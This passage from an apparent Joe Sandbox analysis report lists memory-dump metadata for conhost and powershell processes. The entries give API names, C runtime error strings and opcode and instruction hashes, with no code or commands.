                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 44473131342b9c3d6659860616ea861b569dae8c1284f4b33d658fc321378122
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 63314422A0864185EA209F11A4107BAB6B0FBA4BA5F844335FEDD93BD5EF3DE056C740
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000020.00000002.3953054160.00007FF6CE1F1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CE1F0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3952978214.00007FF6CE1F0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953160617.00007FF6CE20A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953228157.00007FF6CE20C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953288791.00007FF6CE213000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953288791.00007FF6CE215000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953425275.00007FF6CE218000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_7ff6ce1f0000_conhost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: wcslen
                                                                                                                                                                                                                                                    • String ID: 0$@
                                                                                                                                                                                                                                                    • API String ID: 4088430540-1545510068
                                                                                                                                                                                                                                                    • Opcode ID: 26fbaa74645c58beb1c662cd1072959fce96db4e188e223cb72cb4d6abf3e704
                                                                                                                                                                                                                                                    • Instruction ID: c312cf0bada99cf7f8f3ff63f03aeebbde7c271a87a9dc7c5372a81c427342c3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 26fbaa74645c58beb1c662cd1072959fce96db4e188e223cb72cb4d6abf3e704
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4921663261878086E3208FA5F44579AB6B4FBD4798F604225FBC887F99EF7CC0598B40
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000020.00000002.3953054160.00007FF6CE1F1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CE1F0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3952978214.00007FF6CE1F0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953160617.00007FF6CE20A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953228157.00007FF6CE20C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953288791.00007FF6CE213000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953288791.00007FF6CE215000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953425275.00007FF6CE218000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_7ff6ce1f0000_conhost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: strlen
                                                                                                                                                                                                                                                    • String ID: this${parm#$}
                                                                                                                                                                                                                                                    • API String ID: 39653677-3278767634
                                                                                                                                                                                                                                                    • Opcode ID: d126d87f218acd473fc4b93330089d8a4941b7047482bd3d1eb6a4281afbbf06
                                                                                                                                                                                                                                                    • Instruction ID: 7d0794822d8a005545297ce8ce381434bf99d4b29b5d0851e3c77cc594edfab1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d126d87f218acd473fc4b93330089d8a4941b7047482bd3d1eb6a4281afbbf06
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E821A672A4C6C281E7268F2990103F927B1EB25F95F484132DE8D5AB89DF7CD4958361
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000020.00000002.3953054160.00007FF6CE1F1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CE1F0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3952978214.00007FF6CE1F0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953160617.00007FF6CE20A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953228157.00007FF6CE20C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953288791.00007FF6CE213000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953288791.00007FF6CE215000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953425275.00007FF6CE218000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_7ff6ce1f0000_conhost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: wcslen
                                                                                                                                                                                                                                                    • String ID: 0$@
                                                                                                                                                                                                                                                    • API String ID: 4088430540-1545510068
                                                                                                                                                                                                                                                    • Opcode ID: aea334ff16771d315f46423bd26d5fdcc2d3ba9439c4921da91f434a81118734
                                                                                                                                                                                                                                                    • Instruction ID: 0613f31c0e4d6c8020a8e27d2d1b3c118d1076704faf7442081dfe951ccda1f0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aea334ff16771d315f46423bd26d5fdcc2d3ba9439c4921da91f434a81118734
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8111BF2261878182E7109F61F48539AA770EFD4354F500135FBCC87B99EF7CC4468B00
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000020.00000002.3953054160.00007FF6CE1F1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CE1F0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3952978214.00007FF6CE1F0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953160617.00007FF6CE20A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953228157.00007FF6CE20C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953288791.00007FF6CE213000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953288791.00007FF6CE215000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953425275.00007FF6CE218000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_7ff6ce1f0000_conhost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: fprintf
                                                                                                                                                                                                                                                    • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                                                                                                                    • API String ID: 383729395-3474627141
                                                                                                                                                                                                                                                    • Opcode ID: c6129450d7204aa9425f0b0a5ee21873e3dcf374583c3fc542229302485bd395
                                                                                                                                                                                                                                                    • Instruction ID: 18289a0d5fc00121523faeb314a2a9c3378a4797f3b708b70aeca85657719bdb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c6129450d7204aa9425f0b0a5ee21873e3dcf374583c3fc542229302485bd395
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7D017062908E84C2D6168F1C98012EAB374FF6975AF245325FACD76660DF2DD593C700
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000020.00000002.3953054160.00007FF6CE1F1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CE1F0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3952978214.00007FF6CE1F0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953160617.00007FF6CE20A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953228157.00007FF6CE20C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953288791.00007FF6CE213000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953288791.00007FF6CE215000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953425275.00007FF6CE218000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_7ff6ce1f0000_conhost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: fprintf
                                                                                                                                                                                                                                                    • String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                                                                                                                    • API String ID: 383729395-2187435201
                                                                                                                                                                                                                                                    • Opcode ID: 29f4ef5d8c173d3b74eb3c22cac1c5b2ad5d3302bc35ae5ea985eda276a5f484
                                                                                                                                                                                                                                                    • Instruction ID: ce2c2eabadb27ffa1b03eb166411e11a3b8a74e56392677a8c8ab1a3356aa5a7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 29f4ef5d8c173d3b74eb3c22cac1c5b2ad5d3302bc35ae5ea985eda276a5f484
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 58F06262908E8481D6118F18A4002FAB374FF5D79AF585326FACE769A4DF2CD6828740
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000020.00000002.3953054160.00007FF6CE1F1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CE1F0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3952978214.00007FF6CE1F0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953160617.00007FF6CE20A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953228157.00007FF6CE20C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953288791.00007FF6CE213000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953288791.00007FF6CE215000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953425275.00007FF6CE218000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_7ff6ce1f0000_conhost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: fprintf
                                                                                                                                                                                                                                                    • String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                                                                                                                    • API String ID: 383729395-4273532761
                                                                                                                                                                                                                                                    • Opcode ID: 0bcdd2314c3c51517d5ee07b94d97467dc0410b7a3df75df8a4817ab909ac92e
                                                                                                                                                                                                                                                    • Instruction ID: 9fe8a80b18c45afb2652cc84da7c981cde8ba1bbf6904f69ab8c544b5d20b50c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0bcdd2314c3c51517d5ee07b94d97467dc0410b7a3df75df8a4817ab909ac92e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 63F06262908E8481D6118F18A4002FAB374FF6E79AF585326FACD36964DF2CD6828740
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000020.00000002.3953054160.00007FF6CE1F1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CE1F0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3952978214.00007FF6CE1F0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953160617.00007FF6CE20A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953228157.00007FF6CE20C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953288791.00007FF6CE213000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953288791.00007FF6CE215000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953425275.00007FF6CE218000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_7ff6ce1f0000_conhost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: fprintf
                                                                                                                                                                                                                                                    • String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                                                                                                                    • API String ID: 383729395-4064033741
                                                                                                                                                                                                                                                    • Opcode ID: ffc7f7083ab47e760bb295ee22dbabe757db34ba60a4b9d6e098a080ac5640f8
                                                                                                                                                                                                                                                    • Instruction ID: 8dbc91871bc36eb4379e0a764403cfbfe6bd0f95d41f948b6459bc313d61bde1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ffc7f7083ab47e760bb295ee22dbabe757db34ba60a4b9d6e098a080ac5640f8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 03F06262908E8481D6118F18A4002FAB374FF5D79AF585326FACE369A4DF2CD6828740
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000020.00000002.3953054160.00007FF6CE1F1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CE1F0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3952978214.00007FF6CE1F0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953160617.00007FF6CE20A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953228157.00007FF6CE20C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953288791.00007FF6CE213000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953288791.00007FF6CE215000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953425275.00007FF6CE218000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_7ff6ce1f0000_conhost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: fprintf
                                                                                                                                                                                                                                                    • String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                                                                                                                    • API String ID: 383729395-4283191376
                                                                                                                                                                                                                                                    • Opcode ID: c490c49c59b9e24825c0a6802d573e2208797f7dd482eb3f8c93c705cb10b757
                                                                                                                                                                                                                                                    • Instruction ID: 2d2e7caf447ddcbcfe28ca37daaaab31eb13cbe5a458475169f6239f79f6756e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c490c49c59b9e24825c0a6802d573e2208797f7dd482eb3f8c93c705cb10b757
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3BF06862908E8481D611CF1894101FAB374FF5D75AF585325FACD36564DF1CD6438740
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000020.00000002.3953054160.00007FF6CE1F1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CE1F0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3952978214.00007FF6CE1F0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953160617.00007FF6CE20A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953228157.00007FF6CE20C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953288791.00007FF6CE213000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953288791.00007FF6CE215000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953425275.00007FF6CE218000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_7ff6ce1f0000_conhost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: fprintf
                                                                                                                                                                                                                                                    • String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                                                                                                                    • API String ID: 383729395-2468659920
                                                                                                                                                                                                                                                    • Opcode ID: 6e42f6ab832643018c5ab5e1db53d9ba1314b211f5c00237c330fd30a230164e
                                                                                                                                                                                                                                                    • Instruction ID: 1b39d212f58f433a463f4ed85f98cdc925106025896c69068be934f71c2d8c7c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6e42f6ab832643018c5ab5e1db53d9ba1314b211f5c00237c330fd30a230164e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3AF06262908E8481D611CF18A4002FBB374FF9D79AF585326FACD76964DF2CD6828740
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000020.00000002.3953054160.00007FF6CE1F1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CE1F0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3952978214.00007FF6CE1F0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953160617.00007FF6CE20A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953228157.00007FF6CE20C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953288791.00007FF6CE213000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953288791.00007FF6CE215000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953425275.00007FF6CE218000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_7ff6ce1f0000_conhost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: fprintf
                                                                                                                                                                                                                                                    • String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                                                                                                                    • API String ID: 383729395-2713391170
                                                                                                                                                                                                                                                    • Opcode ID: abe0cd034ca6e7e039f3be2709ea70163147327bdca782690fe654ac2d43d253
                                                                                                                                                                                                                                                    • Instruction ID: b8520988f675574154c9e76bc2a13454cafa3c1aef31ad56b0fd3432a32089e1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: abe0cd034ca6e7e039f3be2709ea70163147327bdca782690fe654ac2d43d253
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5AF06262904F8481D6018F18A4401AAB374FF5D79AF585326FEC936564DF2CD6828700
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000020.00000002.3953054160.00007FF6CE1F1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CE1F0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3952978214.00007FF6CE1F0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953160617.00007FF6CE20A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953228157.00007FF6CE20C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953288791.00007FF6CE213000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953288791.00007FF6CE215000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953425275.00007FF6CE218000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_7ff6ce1f0000_conhost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalSection$EnterLeavefree
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4020351045-0
                                                                                                                                                                                                                                                    • Opcode ID: 2dfa7707a2d4e303a1a78d16bdb6f7eaf57818cde39d8471c90da31edd0f8fca
                                                                                                                                                                                                                                                    • Instruction ID: 770b30b785463473ff9ad7291fddd2cb71376acfb142ba37867005305ddc15af
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2dfa7707a2d4e303a1a78d16bdb6f7eaf57818cde39d8471c90da31edd0f8fca
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C6117962F1D60286EB148FA0A9A033833B2AFB4B02B555434E58DE7651DF6EED518380
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000021.00000002.2432694153.00007FFE7DD0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DD0D000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_7ffe7dd0d000_powershell.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 01e8a486693b9a6bdfea007906df8c47ce01d953335895f6d36b8cd5b2139b3e
                                                                                                                                                                                                                                                    • Instruction ID: aa2324d3d8701f4fd568777c447185a7527c2b160053ac01016d8ddf7d598165
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 01e8a486693b9a6bdfea007906df8c47ce01d953335895f6d36b8cd5b2139b3e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 33112E3151CF088F9BA8EF1DE48595677E0FB98321B104B5FD459C7666D731E881CB82
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000021.00000002.2433911667.00007FFE7DE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DE20000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_7ffe7de20000_powershell.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 6cd3c5edcfc4eabbb544dbac2731316c486421f419c4adbba40ab582c5cd9bae
                                                                                                                                                                                                                                                    • Instruction ID: 2d71ea80328bc267fa94899f0c3219a319f317888b5f117d63c64b3fb5345925
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6cd3c5edcfc4eabbb544dbac2731316c486421f419c4adbba40ab582c5cd9bae
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0401A77111CB0C8FD744EF0CE451AA6B3E0FB95360F10052EE58AC36A1D632E881CB41
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000021.00000002.2435008979.00007FFE7DEF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DEF0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_7ffe7def0000_powershell.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: e542e6ca1d98c7c52452ffb8c6eeb3c7f249835954cb5654d9a99b30bca3e673
                                                                                                                                                                                                                                                    • Instruction ID: 24b71b6c3061646d2fc6b8806cc30e8f6c5451b7fe6a9ad46410951cba8e94de
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e542e6ca1d98c7c52452ffb8c6eeb3c7f249835954cb5654d9a99b30bca3e673
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A5F05E33A5C9458FD6A6EA5CE8418A877E0EF4532071501BBD16DC7573EA25EC418784
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000021.00000002.2435008979.00007FFE7DEF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DEF0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_7ffe7def0000_powershell.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: ff4fb99b2e4595299bdfc39e17d9b9801b6eaf909a3b9f9ea8288daabce3ceca
                                                                                                                                                                                                                                                    • Instruction ID: e6495e7f2e78e2e8995756140b1443200f02f8ecec1b80811ec64984f1c848f8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ff4fb99b2e4595299bdfc39e17d9b9801b6eaf909a3b9f9ea8288daabce3ceca
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6EF0A03131CF044FE748EE2DE8496A6B3E1FBA8311F10462FE44AC3661DA25E8818782
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000021.00000002.2435008979.00007FFE7DEF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DEF0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_7ffe7def0000_powershell.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 2ddf7f6b9b27b3ae020b600fdcf09f41e4963cf2cf79b123397b305aec96aab0
                                                                                                                                                                                                                                                    • Instruction ID: 46bf9e6f656a4d98b1158e459044fbf34508091a8e2e937c4f09feebae16197f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2ddf7f6b9b27b3ae020b600fdcf09f41e4963cf2cf79b123397b305aec96aab0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FAF05E3291C6448FE6A6EA5CD4419A877E0EF4532070500B7D119D7563E626AC40C740
                                                                                                                                                                                                                                                    Memory Dump Source
